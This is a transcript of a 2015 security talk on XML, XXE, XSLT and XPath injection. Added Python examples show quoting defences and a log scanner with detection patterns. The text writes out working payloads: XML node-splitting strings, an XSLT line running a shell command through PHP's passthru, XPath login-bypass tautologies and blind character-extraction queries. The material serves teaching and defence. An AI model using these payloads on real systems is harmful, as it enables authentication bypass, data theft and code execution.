XML & XPath Injections

Posted on 09-Jul-2015


This presentation was presented at null/G4h monthly meet Bangalore - August 2014

Transcript of XML & XPath Injections

XML & XPath Injection

By AMol NAik (@amolnaik4)

Agenda

XML Basics

XML Injection

XXE Attack

XSLT Attacks

XPath Basics

XPath Injections

XPath Tools

All codes are at:

https://bitbucket.org/null0x00/null-humla-xml-injection/


XML Basics

eXtensible Markup Language

Flexible text-based format

Presents structured information

Used for data exchange and storage

XML Components

Root Element

Node

Node Value

Attribute

Entity

CDATA Section

XML – CDATA Section

Tells the parser not to treat the characters in this section as markup

Examples:

<![CDATA[if (c<10)]]>

<![CDATA[<script>alert(1)</script>]]>

XML Injections

In Node Attribute

In Node Value

In CDATA Section

XML Injection – Node Attribute

Payload:

102"><author>demo</author><title>Demo Demo</title><price>FREE</price></book><book id="

Original document:

<catalog>
  <book id="101">
    <author>Anonymous</author>
    <title>We Are Anonymous</title>
    <price>INR 200</price>
  </book>
</catalog>

XML Injection – Node Attribute

Resulting document:

<catalog>
  <book id="102">
    <author>demo</author>
    <title>Demo Demo</title>
    <price>FREE</price>
  </book>
  <book id="101">
    <author>Anonymous</author>
    <title>We Are Anonymous</title>
    <price>INR 200</price>
  </book>
</catalog>

XML Injection – Node Value

Payload:

Anonymous</author><title>Demo Demo</title><price>FREE</price></book><book id="102"><author>

Original document:

<catalog>
  <book id="101">
    <author>Anonymous</author>
    <title>We Are Anonymous</title>
    <price>INR 200</price>
  </book>
</catalog>

XML Injection – Node Value

Resulting document:

<catalog>
  <book id="101">
    <author>Anonymous</author>
    <title>Demo Demo</title>
    <price>FREE</price>
  </book>
  <book id="102">
    <author>demo</author>
    <title>We Are Anonymous</title>
    <price>INR 200</price>
  </book>
</catalog>

XML Injection – CDATA

Payload:

INR 200]]></price></book><book id="102"><author>demo</author><title>Demo Demo</title><price><![CDATA[

Original document:

<catalog>
  <book id="101">
    <author>Anonymous</author>
    <title>We Are Anonymous</title>
    <price><![CDATA[INR 200]]></price>
  </book>
</catalog>

XML Injection – CDATA

Resulting document:

<catalog>
  <book id="101">
    <author>Anonymous</author>
    <title>We Are Anonymous</title>
    <price><![CDATA[INR 200]]></price>
  </book>
  <book id="102">
    <author>demo</author>
    <title>Demo Demo</title>
    <price><![CDATA[FREE]]></price>
  </book>
</catalog>
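As an added example (not from the slides or the linked repository), this Python script rebuilds the catalog with string concatenation, so the node-attribute and CDATA payloads above split the document exactly as shown, and then builds it again with the attribute quoted by quoteattr() and the CDATA value split on "]]>", so the same inputs stay plain data; the payloads are the slides' own, the function names are mine.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

# Payloads from the node-attribute and CDATA slides, re-typed with straight
# quotes (the curly quotes on the slides are a rendering artefact).
ATTR_PAYLOAD = ('102"><author>demo</author><title>Demo Demo</title>'
                '<price>FREE</price></book><book id="')
CDATA_PAYLOAD = ('INR 200]]></price></book><book id="102"><author>demo</author>'
                 '<title>Demo Demo</title><price><![CDATA[')

def build_unsafe(book_id, price):
    # String concatenation, as on the slides: whatever the user typed is markup.
    return ('<catalog><book id="%s"><author>Anonymous</author>'
            '<title>We Are Anonymous</title><price><![CDATA[%s]]></price>'
            '</book></catalog>' % (book_id, price))

def cdata(value):
    # A CDATA section ends at the first "]]>", so split that sequence across two
    # sections; the parser re-joins the text and the literal "]]>" survives.
    return '<![CDATA[' + value.replace(']]>', ']]]]><![CDATA[>') + ']]>'

def build_safe(book_id, price):
    # quoteattr() escapes &, < and > and picks a quote style the value cannot
    # close early; cdata() keeps the whole price inside one CDATA value.
    return ('<catalog><book id=%s><author>Anonymous</author>'
            '<title>We Are Anonymous</title><price>%s</price>'
            '</book></catalog>' % (quoteattr(book_id), cdata(price)))

def books(xml_text):
    # Parse the catalog and list the (id, price) pairs the application would see.
    root = ET.fromstring(xml_text)
    return [(b.get('id'), b.findtext('price')) for b in root.findall('book')]

if __name__ == '__main__':
    print(books(build_unsafe(ATTR_PAYLOAD, 'INR 200')))  # two books: injected
    print(books(build_safe(ATTR_PAYLOAD, 'INR 200')))    # one book, id is just text
    print(books(build_unsafe('101', CDATA_PAYLOAD)))     # two books: injected
    print(books(build_safe('101', CDATA_PAYLOAD)))       # one book, price is just text
```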

XML Entity

Variable definitions

Shortcuts

Standard text

Special characters

Can be internal or external

XML Entity

XXE Attack

XSLT

Extensible Stylesheet Language Transformations

Used for the transformation of XML documents

Think of it as the CSS of XML

XSLT

XSLT Injection

XSS

<script>alert(document.cookie)</script>

Code Execution

<xsl:value-of select="php:function('passthru','ls -la /')"/>

XPath Basics

Language for selecting XML nodes

Models XML data as a tree of nodes

Similar to SQL (in some sense)

XPath Syntax

Uses path expressions to select nodes or node-sets in an XML document

Expression   Description
nodename     Selects all child nodes of the named node
/            Selects from the root node
//           Selects matching nodes below the current node, no matter where they are
.            Selects the current node
..           Selects the parent of the current node

XPath Predicates

Used to find a specific node, or a node that contains a specific value.

Always enclosed in square brackets.

Expression                         Result
/Employees/Employee[1]             Selects the first 'Employee' element that is a child of the 'Employees' element
/Employees/Employee[last()]        Selects the last 'Employee' element that is a child of the 'Employees' element
/Employees/Employee[position()<3]  Selects the first two 'Employee' elements that are children of the 'Employees' element
//Employee[@ID='1']                Selects all 'Employee' elements that have an attribute named 'ID' with a value of '1'

XPath Location Path

Syntax: axisname::nodetest[predicate]

axis – defines the tree relationship between the selected nodes and the current node

nodetest – identifies the nodes within an axis

zero or more predicates – further refine the selected node-set

XPath Location Path

Example                Result
child::Employee        Selects all 'Employee' nodes that are children of the current node
attribute::id          Selects the id attribute of the current node
child::*               Selects all element children of the current node
attribute::*           Selects all attributes of the current node
child::text()          Selects all text-node children of the current node
child::node()          Selects all child nodes of the current node
descendant::Employees  Selects all 'Employees' descendants of the current node

XPath Functions

Function                  Description
substring(str,start,len)  Returns the substring of str that starts at position start and has length len
string-length(str)        Returns the length of the string
count(item,item,…)        Returns the count of the nodes
starts-with(str1,str2)    Returns true if str1 starts with str2, else false
contains(str1,str2)       Returns true if str1 contains str2, else false
number(arg)               Returns the numeric value of the argument, which can be a boolean, string or node-set
string(arg)               Returns the string value of the argument, which can be a boolean, string or node-set

XPath Injection

XPath Query:

/Employees/Employee[UserName/text() = 'user' and Password/text() = 'passwd']/Type/text()

XPath Injection

No UserName & Password known:

user = ' or '1'='1
passwd = ' or '1'='1

/Employees/Employee[UserName/text() = '' or '1'='1' and Password/text() = '' or '1'='1']/Type/text()

XPath Injection

UserName known:

user = mbrown' or '1'='1
passwd = anything

/Employees/Employee[UserName/text() = 'mbrown' or '1'='1' and Password/text() = 'anything']/Type/text()

XPath Injection

No UserName & Password known & Password is not vulnerable:

user = ' or '1'='1' or '1'='1
passwd = anything

/Employees/Employee[UserName/text() = '' or '1'='1' or '1'='1' and Password/text() = 'anything']/Type/text()
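Added example (not from the slides): a Python builder for the login query above that shows the concatenated form next to one that encodes each input as a single XPath 1.0 string literal, switching to concat() when a value holds both kinds of quote; LOGIN_QUERY and the function names are mine.

```python
# Query shape from the slides; the two %s slots take the user-supplied literals.
LOGIN_QUERY = ("/Employees/Employee[UserName/text() = %s and "
               "Password/text() = %s]/Type/text()")

def xpath_literal(value):
    """Encode a Python string as one XPath 1.0 string literal.

    XPath 1.0 literals have no escape character, so a value holding only one
    kind of quote is wrapped in the other kind, and a value holding both kinds
    is split on the single quote and rebuilt with concat().
    """
    if "'" not in value:
        return "'%s'" % value
    if '"' not in value:
        return '"%s"' % value
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join("'%s'" % p for p in parts) + ")"

def login_query_unsafe(user, passwd):
    # Plain concatenation, as on the slides: a quote in the input ends the literal.
    return LOGIN_QUERY % ("'%s'" % user, "'%s'" % passwd)

def login_query_safe(user, passwd):
    # Each input stays a single literal, whatever quotes or keywords it holds.
    return LOGIN_QUERY % (xpath_literal(user), xpath_literal(passwd))

if __name__ == '__main__':
    probe = "' or '1'='1"
    print(login_query_unsafe(probe, probe))   # predicate is always true
    print(login_query_safe(probe, probe))     # compares against the literal probe
    print(login_query_safe("mbrown' or \"x\"=\"x", "anything"))  # concat() form
```

With lxml the safe string runs as root.xpath(login_query_safe(u, p)); lxml also accepts XPath variables (root.xpath(expr, u=user, p=passwd) with $u and $p in the expression), which avoids building literals at all.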

Blind XPath Injection

XPath Query: /Employees/Employee[@ID='_id_']

/Employees/Employee[@ID='1' and '1'='1'] => TRUE

/Employees/Employee[@ID='1' and '1'='2'] => FALSE

Blind XPath Injection

Extracting XML file structure

Get count of all nodes: count(/*/child::*)

Get name of first node: name(/*/child::*[1])

Get count of child nodes of first node: count(/*/child::*[1]/child::*)

Blind XPath Injection

Extracting XML file structure

Get name of first child node of first node: name(/*/child::*[1]/child::*[1])

Get value of first child node of first node: /*/child::*[1]/child::*[1]/text()

Repeat the process for all child nodes

Blind XPath Injection

Extracting XML file structure

Check whether the first character of the value of the first child node of the first node is 'J':

/Employees/Employee[@ID='123' or substring((/*/child::*[1]/child::*[1]/text()),1,1)='J']
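From the defender's side, as an added example that is not on the slides: a Python scan over constructed access-log lines that flags request parameters carrying the tautologies and the structure-walking XPath functions used in this section; the log lines, paths, client addresses and rule names are constructed for the demo.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from the slides): one normal login and three
# requests carrying the kinds of probe shown in this section.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jul/2015:10:00:01 +0530] "GET /login?user=mbrown&passwd=secret HTTP/1.1" 200 512
10.0.0.9 - - [09/Jul/2015:10:00:07 +0530] "GET /login?user=%27+or+%271%27%3D%271&passwd=x HTTP/1.1" 200 2048
10.0.0.9 - - [09/Jul/2015:10:00:12 +0530] "GET /employee?id=123%27+or+substring%28%28%2F%2A%2Fchild%3A%3A%2A%5B1%5D%2Ftext%28%29%29%2C1%2C1%29%3D%27J HTTP/1.1" 200 317
10.0.0.9 - - [09/Jul/2015:10:00:15 +0530] "GET /employee?id=1%27+and+count%28%2F%2A%2Fchild%3A%3A%2A%29%3D3+and+%271%27%3D%271 HTTP/1.1" 200 317
"""

# Rules run against the URL-decoded parameter value; the names are my own labels.
RULES = [
    ("tautology", re.compile(r"\b(or|and)\s*'[^']*'\s*=\s*'", re.I)),
    ("xpath-function", re.compile(
        r"\b(count|name|substring|string-length|starts-with|contains)\s*\(", re.I)),
    ("xpath-axis", re.compile(r"/\*|\b(child|descendant|attribute)::|text\(\)")),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def classify(value):
    # Names of every rule the decoded value trips, in a stable order.
    return sorted(name for name, rx in RULES if rx.search(value))

def scan(log_text):
    # Returns (client, path, parameter, reasons) for each suspicious parameter.
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            reasons = classify(value)
            if reasons:
                findings.append((client, parts.path, param, reasons))
    return findings

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```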

XPath Injection Tools

XPath Blind Explorer

Xcat

xmlchor - IronWASP Plugin

recon-ng

xpath_bruter


Thank You !!

AMol NAik

http://twitter.com/amolnaik4

http://amolnaik4.blogspot.com